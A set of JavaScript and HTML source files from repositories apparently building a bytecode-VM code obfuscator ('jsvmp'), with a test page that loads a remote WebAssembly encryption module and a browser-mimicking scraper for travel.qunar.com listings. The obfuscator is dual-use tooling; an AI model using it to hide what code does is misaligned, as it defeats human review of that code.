let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
let node = node2.program.body
for (let i = 0; i < node.length; i++){
startgetType(node[i], changlc[name]['variablePool'], changlc[name]['zhili'])
}
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(10)
hb.push(toPool(i))
}
}
hb.push(1)
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
start(ast)
cood = ``
datatext = "var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2;
fs.writeFileSync("./outsrc/out.js", cood + datatext, (e)=>{})
}
const soure = "test.js"
if (offes5 ===1){
process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
if (!error) {
console.log("es6 to es5 ==> 成功");
cbbjsvmp()
console.log("file is save ==> ./outsrc/out.js");
} else {
console.log("es6 to es5 ==> 失败");
}
});
} else {
cbbjsvmp()
console.log("file is save ==> ./outsrc/out.js");
}
|
2833844911/gojsvmp | 1,250 | wasmvmptest.html | <html>
<style>
body, html {
height: 100%;
margin: 0;
font-family: Arial, sans-serif;
}
.container {
height: 100%;
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
}
input[type="text"] {
padding: 10px;
margin: 10px 0;
width: 200px;
border: 2px solid #ccc;
border-radius: 5px;
}
button {
padding: 10px 20px;
font-size: 16px;
color: white;
background-color: #007BFF;
border: none;
border-radius: 5px;
cursor: pointer;
}
button:hover {
background-color: #0056b3;
}
</style>
<script src="static/wasm_exec.js"></script>
<script>
window.cycallback = function (a){
console.log("加密结果",a)
alert("加密结果"+ a)
};
window.cbbbbbbbbbbb = function (){
var inputValue = document.getElementById('inputBox').value;
getCyDt(inputValue)
}
const go = new Go();
WebAssembly.instantiateStreaming(fetch("https://ciyverify.com/cyvmp4.wasm"), go.importObject)
.then((result) => go.run(result.instance));
</script>
<body>
<div class="container">
<input type="text" id="inputBox" placeholder="输入加密值">
<button onclick="cbbbbbbbbbbb()">Submit</button>
</div>
</body>
</html> |
2833844911/gojsvmp | 2,280 | test2.js | // -- gbk --
function goTonr(){
this.headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"accept-language": "zh-CN,zh;q=0.9",
"cache-control": "no-cache",
"pragma": "no-cache",
"priority": "u=0, i",
"referer": "https://travel.qunar.com/search/gonglue/22-shanghai-299878/hot_heat/3.htm",
"^sec-ch-ua": "^\\^Google",
"sec-ch-ua-mobile": "?0",
"^sec-ch-ua-platform": "^\\^Windows^^^",
"sec-fetch-dest": "document",
"sec-fetch-mode": "navigate",
"sec-fetch-site": "same-origin",
"sec-fetch-user": "?1",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
}
this.getPageInfo = function (url){
console.log("ʼ첽Promise",url)
var d = new Promise(function(){
req = cyhttp.get(url,{
"headers": this.headers,
"timeout": 30,
// "proxies":"http://127.0.0.1:8888"
})
cyout(req.text)
// cbb_aݵthenĵһ || cbb_bݵthenĵڶ
cbb_a(req.text)
})
d.then(function (text){
parseHTML = etree.HTML(text)
title = parseHTML.xpath('//ul[@class="b_strategy_list "]/li//h2')
urlList = parseHTML.xpath('//ul[@class="b_strategy_list "]/li//h2/a/@href')
var b = fs.open("./a.csv",{"ms":"a"})
for (var i=0 ; i<title.length; i++){
b.write( [title[i].xpath('.//text()').join(" "), "https://travel.qunar.com"+urlList[i]].join(",")+"\n")
console.log(title[i].xpath('.//text()').join(" "))
}
b.close()
console.log("첽")
})
}
}
var b = fs.open("./a.csv",{"ms":"w"})
b.write(["",""].join(",")+"\n")
b.close()
var ff = new goTonr()
for (var i =1; i<10; i++){
st = Date.now()
ff.getPageInfo("https://travel.qunar.com/search/gonglue/22-shanghai-299878/hot_heat/"+i+".htm")
// ȴǰ첽
wait()
cyout("ʱ", Date.now() - st, "ms")
debugger
// 10000ms
Date.sleep(10000)
}
|
2833844911/cy_jsvmp | 31,691 | main_pro.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const process = require("child_process");
const {es6toes5} = require("./tool/es5toes6");
const {switchtoif} = require("./tool/switchtoif");
const {bindfun} = require("./tool/bindfun");
// 是否转es5
offes5 = 0
var dat = {"instanceof": 1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,"===":53,"!==":54,"!=":550,"in":551}
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++)
{
datkey[i] = datkey[i]+"="
}
var fornum = 0
var codeOfmyfun = [];
function cbbjsvmp(soure,outpath){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
var dataText2 = fs.readFileSync("./tool/jsvmp_out_pro.js") + '';
var changlc = {}
var constantPool = []
dataText = es6toes5(dataText)
var ast = parser.parse(dataText)
// 使用插件优化代码
ast = renameCj(ast)
// dataText2 = switchtoif(dataText2)
var numberKuai = 0
function copyArrayList(sour, newl){
for (let i = 0; i < newl.length; i++){
sour.push(newl[i])
}
}
function toPool(value){
var a1,a2
a1 = constantPool.indexOf(value)
if (a1 == -1){
a2 = constantPool.length
constantPool.push(value)
return a2
}else{
return a1
}
}
function startgetType(node, variablePool, zhili, come){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili, come);
zhili.push(192)
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3, come)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
zhili.push(190)
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2, come)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili, come)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili, come)
zhili.push(57)
zhili.push(fbme)
zhili.push(10)
zhili.push(toPool( 0))
zhili.push(23)
zhili.push(22)
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(23)
zhili.push(10)
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(181)
zhili.push(23)
zhili.push(10)
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(181)
zhili.push(10)
zhili.push(toPool("length"))
zhili.push(181)
zhili.push(240)
zhili.push(25)
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy, come)
startgetType(node.left.declarations[0].id, variablePool,dyyy, come)
}else {
startgetType(node.left, variablePool,dyyy, come)
}
dyyy.pop()
dyyy.push(23)
dyyy.push(10)
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(181)
dyyy.push(23)
dyyy.push(10)
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(181)
dyyy.push(181)
dyyy.push(90)
startgetType(node.body,variablePool,dyyy, come)
dyyy.push(23)
dyyy.push(26)
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(190)
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = 190;
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = 190;
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili, come)
if (node.operator =="++"){
// zhili.push(26)
zhili.pop()
zhili.push(10)
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili, come)
zhili.push(20)
zhili.push(90)
startgetType(node.argument, variablePool, zhili, come)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(10)
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili, come)
zhili.push(19)
zhili.push(90)
startgetType(node.argument, variablePool, zhili, come)
}
break
case "LabeledStatement":
let vbvb = [];
let vbvbname = node.label.name;
startgetType(node.body, variablePool, vbvb, come)
for (var ff=0; ff<vbvb.length; ff++){
if (vbvb[ff] === vbvbname){
vbvb[ff] = 190;
vbvb[ff+1] = vbvb.length - ff-2;
}
}
copyArrayList(zhili, vbvb)
break
case "BreakStatement":
if (node.label){
zhili.push(node.label.name)
zhili.push(undefined)
}else {
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
}
break
case "DebuggerStatement":
zhili.push(194)
break
case "ForStatement":
startgetType(node.init, variablePool,zhili, come)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili, come)
if (node.test == null)
{
zhili.push(10)
zhili.push(toPool(true))
}
zhili.push(25)
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj, come)
startgetType(node.update, variablePool, fgfgfdsujj, come)
fgfgfdsujj.push(190)
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = 190;
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = 190;
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili, come)
zhili.push(25)
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj, come)
jiiiujj.push(190)
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = 190;
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = 190;
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj, come)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = 190;
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = 190;
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili, come)
zhili.push(192)
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili, come)
zhili.push(23)
zhili.push(22)
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili, come)
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(10)
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili, come)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz, come)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(10)
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(10)
zhili.push(toPool(zwdz[i]))
}
zhili.push(10)
zhili.push(toPool(gggcbb.length))
zhili.push(48)
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = 190;
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili, come)
zhili.push(51)
let bh = []
startgetType(node.right, variablePool, bh, come)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili, come)
zhili.push(252)
let bh = []
startgetType(node.right, variablePool, bh, come)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "BigIntLiteral":
case "StringLiteral":
zhili.push(10)
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.name))
zhili.push(181)
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili, come)
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(10)
zhili.push(toPool(node.property.name))
zhili.push(181)
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(10)
zhili.push(toPool(node.property.value))
zhili.push(181)
}else{
startgetType(node.property, variablePool, zhili, come)
zhili.push(181)
}
break
case "BinaryExpression":
startgetType(node.left, variablePool, zhili, come)
startgetType(node.right, variablePool, zhili, come)
zhili.push(dat[node.operator])
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(10)
zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili, come)
}
if (node.operator == "~"){
zhili.push(44)
}else if (node.operator == "typeof"){
zhili.push(49)
}else if (node.operator == "!"){
zhili.push(60)
}else if (node.operator == "-"){
zhili.push(50)
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(55)
}else if (node.operator == "void"){
zhili.push(56)
}
break
case "CallExpression":
if (node.callee.type==="Identifier" && node.callee.name === "cbb_prgnx"){
zhili.push(1820)
break
}
if (node.callee.type==="Identifier" && node.callee.name === "cbb_prgunx"){
zhili.push(1821)
break
}
if (node.callee.type==="Identifier" && node.callee.name === "cbb_prg"){
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i].callee, variablePool, zhili, come)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.arguments[i].callee.name))
zhili.push(181)
zhili.push(10)
zhili.push(toPool("fg"))
zhili.push(181)
zhili.push(10)
zhili.push(toPool("cbb_isokk_yhh_very_p"))
for (let i2 =0;i2 < node.arguments[i].arguments.length; i2++){
startgetType(node.arguments[i].arguments[node.arguments[i].arguments.length - i2-1], variablePool, zhili)
}
zhili.push(1818)
zhili.push(1817)
}
zhili.push(1812)
zhili.push(1819)
break
}
if (node.callee.type==="Identifier" && node.callee.name.indexOf("cbb_") === 0){
zhili.push(10)
zhili.push(toPool("cbbiyhh_dgggg_opopop"))
}
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili, come)
}
if (node.callee.type==="Identifier" && node.callee.name.indexOf("cbb_") === 0){
startgetType(node.callee, variablePool, zhili, come)
zhili.push(1812)
zhili.push(1813)
}else {
startgetType(node.callee, variablePool, zhili, come)
zhili.push(150)
zhili.push(node.arguments.length)
}
break
case "FunctionDeclaration":
if (node.id.name.indexOf("cbb_") === 0){
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun2(node)
}else {
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
}
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.id.name))
zhili.push(181)
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(bcxh))
zhili.push(181)
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili, come)
if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "AssignmentExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(1810)
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(10)
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(104)
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili, come)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili, come)
zhili.push(58)
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(10)
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili, come)
}
startgetType(node.value, variablePool,zhili, come)
zhili.push(45)
break
case "ArrayExpression":
zhili.push(105)
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili, come)
zhili.push(40)
}
break;
case "RegExpLiteral":
zhili.push(8)
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(195)
let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc, come)
bcnxbc.push(200)
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc, come)
bcnxbc.pop()
bcnxbc.push(197)
startgetType(node.handler.body, variablePool, bcnxbc,come)
}
bcnxbc.push(200)
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc, come)
}
bcnxbc.push(200)
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.left, variablePool, zhili,come)
startgetType(node.right, variablePool, zhili,come)
zhili.push(20)
zhili.push(90)
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.left, variablePool, zhili,come)
startgetType(node.right, variablePool, zhili,come)
zhili.push(291)
zhili.push(90)
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.left, variablePool, zhili,come)
startgetType(node.right, variablePool, zhili,come)
zhili.push(32)
zhili.push(90)
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.left, variablePool, zhili,come)
startgetType(node.right, variablePool, zhili,come)
zhili.push(dat[node.operator.replace("=","")])
zhili.push(90)
}
else{
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.right, variablePool, zhili,come)
zhili.push(290)
}
// startgetType(node.left, variablePool, zhili,come)
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili,come)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili,come)
}
break
case "ThisExpression":
zhili.push(47)
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili,come)
}
startgetType(node.callee, variablePool,zhili,come)
zhili.push(46)
zhili.push(callargsNum)
break
case "ReturnStatement":
if (come){
startgetType(node.argument, variablePool, zhili,come)
zhili.push(1814)
zhili.push(1816)
}else {
startgetType(node.argument, variablePool, zhili,come)
zhili.push(-1)
}
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
function startfun2(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
var fyyy = codeOfmyfun.length
changlc[name] = {"variablePool":{}
, "zhili": codeOfmyfun,
"af":fyyy,
"isfunmr":1,
}
for (let iy =0; iy< node2.params.length; iy++){
let i = node2.params.length-iy-1;
if (node2.params[i].type === "AssignmentPattern"){
changlc[name]['variablePool'][node2.params[i].left.name] = null
startgetType(node2.params[i], changlc[name]['variablePool'], changlc[name]['zhili'],1)
changlc[name]['zhili'].push(23)
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].left.name))
changlc[name]['zhili'].push(1815)
}else {
changlc[name]['variablePool'][node2.params[i].name] = null
changlc[name]['zhili'].push(23)
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].name))
changlc[name]['zhili'].push(1815)
}
}
startgetType(node2.body, changlc[name]['variablePool'], changlc[name]['zhili'], 1)
let hb = []
hb.push(10)
hb.push(toPool("cbbiyhh.online"))
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(10)
hb.push(toPool(i))
}
}
hb.push(1)
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(fyyy,0,hb.pop())
}
delete changlc[name]['zhili']
}
function startfun(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
for (let i =0; i< node2.params.length; i++){
if (node2.params[i].type === "AssignmentPattern"){
changlc[name]['variablePool'][node2.params[i].left.name] = null
startgetType(node2.params[i], changlc[name]['variablePool'], changlc[name]['zhili'])
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].left.name))
}else {
changlc[name]['variablePool'][node2.params[i].name] = null
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].name))
}
}
changlc[name]['zhili'].push(2)
startgetType(node2.body, changlc[name]['variablePool'], changlc[name]['zhili'])
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(10)
hb.push(toPool(i))
}
}
hb.push(1)
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
function start(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
let node = node2.program.body
for (let i = 0; i < node.length; i++){
startgetType(node[i], changlc[name]['variablePool'], changlc[name]['zhili'])
}
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(10)
hb.push(toPool(i))
}
}
hb.push(1)
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
start(ast)
cood = ``
datatext = "(function(){\nvar cywindow = this; var codeOfmyfun = "+ JSON.stringify(codeOfmyfun)+";var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2+"})()";
fs.writeFileSync(outpath, cood + datatext, (e)=>{})
}
// 需要加密的js
const soure = "t3.js"
const outpath = "./outsrc/out.js"
cbbjsvmp(soure,outpath)
// 转es6的插件有问题 readme有方法可转
// if (offes5 ===1){
// process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
// if (!error) {
// console.log("es6 to es5 ==> 成功");
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// } else {
// console.log("es6 to es5 ==> 失败");
// }
// });
// } else {
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// }
|
2833844911/cy_jsvmp | 34,182 | jiamian.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const {hsjsvmpTo} = require("./tool/gooutmvp");
const {switchtoif} = require("./tool/switchtoif");
const {bindfun} = require("./tool/bindfun");
const {tosanyuan} = require("./tool/tosanyuan")
const {es6toes5} = require("./tool/es5toes6");
const process = require("child_process");
// 是否转es5
offes5 = 0
var fornum = 0
var dat = {"instanceof":1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,
"===":53,"!==":54,
"!=":550,"in":551}
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++){
datkey[i] = datkey[i]+"="
}
function RandDataArray(data) {
//混乱准备
var dataTemp = [].concat(data);
var dataBuffer = [];
var length = dataTemp.length;
//混乱数据
var randCount = 0;
var position = 0;
do {
var randvalue = (((length - randCount) - 1) + 1);
position = Math.floor(Math.random() * randvalue);
dataBuffer.push(dataTemp[position]);
randCount++;
dataTemp[position] = dataTemp[length - randCount];
} while (randCount < length);
return dataBuffer;
}
var zhil = [
1811,1810,551, 550, 291, 290, 252, 240, 200, 197, 195, 194, 192, 190, 181, 150, 105, 104, 90, 60, 58, 57, 56, 55, 54, 53, 52, 51, 50, 49, 48, 47, 46, 45, 44, 40, 39, 38, 37, 36, 35, 34, 33, 32, 31, 30, 29, 28, 27, 26, 25, 24, 23, 22, 20, 19, 11, 10, 8, 2, 1
]
zhenzhil = []
for (let i = 0; i < 100000; i++){
zhenzhil.push(i)
}
zhenzhil = RandDataArray(zhenzhil)
zhilDx = {}
for (let i2 = 0; i2 <zhil.length; i2++ ){
zhilDx["z"+zhil[i2]] = []
for (let i =0; i < 30; i++){
zhilDx["z"+zhil[i2]].push(zhenzhil.pop())
}
}
var d = JSON.stringify(zhilDx) +""
fs.writeFileSync("./dist/jiamain.json", d, (e)=>{})
function RandDataCheise(data){
var da = Math.floor(Math.random() * data.length);
return data[da]
}
function getchhduei(){
var duei = fs.readFileSync("./tool/cshshuzduei.js") + '';
duei = duei.replace(/this\.pop/g, "this.cf")
duei = duei.replace(/this\.push/g, "this.cF")
duei = duei.replace(/this\.shift/g, "this.Cf")
duei = duei.replace(/this\.xujia/g, "this.CF")
duei = duei.replace(/this\.length/g, "this.CFf")
var hu = []
for (var i = 2; i< 1000; i++){
hu.push(i)
}
hu = RandDataArray(hu)
var dat = '{"cbb1": [undefined, "cbbbhhhh", undefined],'
var sc = 1
for (let i =0; i< hu.length; i++){
dat = dat.replace("cbbbhhhh","cbb"+hu[i])
var d = `"${"cbb"+hu[i]}": ["${"cbb"+sc}", "cbbbhhhh", undefined],`
dat += d
sc = hu[i]
}
dat = dat.replace("cbbbhhhh","")
dat += '};'
duei = duei.replace("CbbTHALLYhh", dat)
return duei;
}
function cbbjsvmp(soure, outpath){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
var dataText2 = getchhduei() + fs.readFileSync("./tool/jsvmp_outcs.js") + '';
dataText2 = dataText2.replace(/duei\.pop/g, "duei.cf")
dataText2 = dataText2.replace(/duei\.push/g, "duei.cF")
dataText2 = dataText2.replace(/duei\.shift/g, "duei.Cf")
dataText2 = dataText2.replace(/duei\.xujia/g, "duei.CF")
dataText2 = dataText2.replace(/duei\.length/g, "duei.CFf")
dataText2 = dataText2.replace(/g2\.pop/g, "g2.cf")
dataText2 = dataText2.replace(/g2\.push/g, "g2.cF")
dataText2 = dataText2.replace(/g2\.shift/g, "g2.Cf")
dataText2 = dataText2.replace(/g2\.xujia/g, "g2.CF")
dataText2 = dataText2.replace(/g2\.length/g, "g2.CFf")
// 指令扩展
dataText2 = hsjsvmpTo(dataText2)
// 函数隐藏
dataText2 = bindfun(dataText2)
// 变if else
dataText2 = switchtoif(dataText2)
//es6toes5
dataText = es6toes5(dataText)
// 变3元
for (let i = 0; i< 300; i++){
dataText2 = tosanyuan(dataText2)
}
var changlc = {}
var constantPool = []
var ast = parser.parse(dataText)
// 使用插件优化代码
ast = renameCj(ast)
var numberKuai = 0
function copyArrayList(sour, newl){
for (let i = 0; i < newl.length; i++){
sour.push(newl[i])
}
}
function toPool(value){
var a1,a2
a1 = constantPool.indexOf(value)
if (a1 == -1){
a2 = constantPool.length
constantPool.push(value)
return a2
}else{
return a1
}
}
function startgetType(node, variablePool, zhili){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili);
zhili.push(RandDataCheise(zhilDx.z192))
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
zhili.push(RandDataCheise(zhilDx.z190))
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
